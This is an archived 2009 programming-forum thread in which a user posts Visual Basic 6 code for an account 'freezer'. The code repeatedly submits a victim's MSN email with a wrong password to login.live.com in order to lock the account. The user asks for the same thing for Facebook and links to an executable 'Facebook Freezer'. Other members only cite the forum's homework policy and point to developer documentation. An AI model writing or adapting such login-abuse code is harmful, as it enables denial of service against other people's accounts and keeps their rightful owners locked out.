Printable Version of Topic

Click here to view this topic in its original format

Dream.In.Code _ VB6 _ Facebook freezer in visual basic 6

Posted by: CeH 30 Jun, 2009 - 05:30 AM

i make freezer for MsN biggrin.gif and i need code's for facebook freezer.
leave comment on this,leave code's or link for codes
or on my email....
ceh01@net.hr ph34r.gif

Posted by: firebolt 30 Jun, 2009 - 05:46 AM

Dream.In.Code has a policy by which we prefer to see a good faith effort on your part before providing source code for homework assignments. Please post the code you have written in an effort to resolve the problem, and our members would be happy to provide some guidance. Be sure to include a description of any errors you are encountering as well.

Post your code like this: code.gif

Thanks.

Posted by: CeH 1 Jul, 2009 - 11:32 PM

ok,i make frezer for msn (live.com) here is the code: W = Webbrowser

CODE

in button type: W.Navigate ("login.live.com")
                              Me.Caption = "Freezing..... " & Text1.Text & ""

In webbrowser (W):
On Error Resume Next
Dim data As String
    data = W.Document.body.innerhtml
        W.Document.All("login").Value = Text1.Text
        W.Document.All("passwd").Value = "CeHoWnZ"
        W.Document.All("SI").Click
        If InStr(data, "Prijava nije uspjela.") Then
       Me.Caption = "Frozen"
        MsgBox ("The email address, " & Text1.Text & " vas frozen"), vbInformation, "success"
    End If


and i need code for facebook login,i try (facebook.login,login.facebok,gacebook login.php...and it's not) pls help me, i need this for my project smile.gif

** Edit ** code.gif

Posted by: no2pencil 1 Jul, 2009 - 11:37 PM

Please use code tags when posting code.

Did you Check the http://developers.facebook.com?

Posted by: CeH 1 Jul, 2009 - 11:54 PM

happy.gif no, it's not . i need something like "GZ's facebook freezer acc."
here is the link;



http://rapidshare.com/files/250962600/GroundZero_s_Facebook_Freezer.exe.html

i need code for facebook login(for msn is (login.live.com)) i need for face...
thx
sry for my eng.i'm in croatia

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)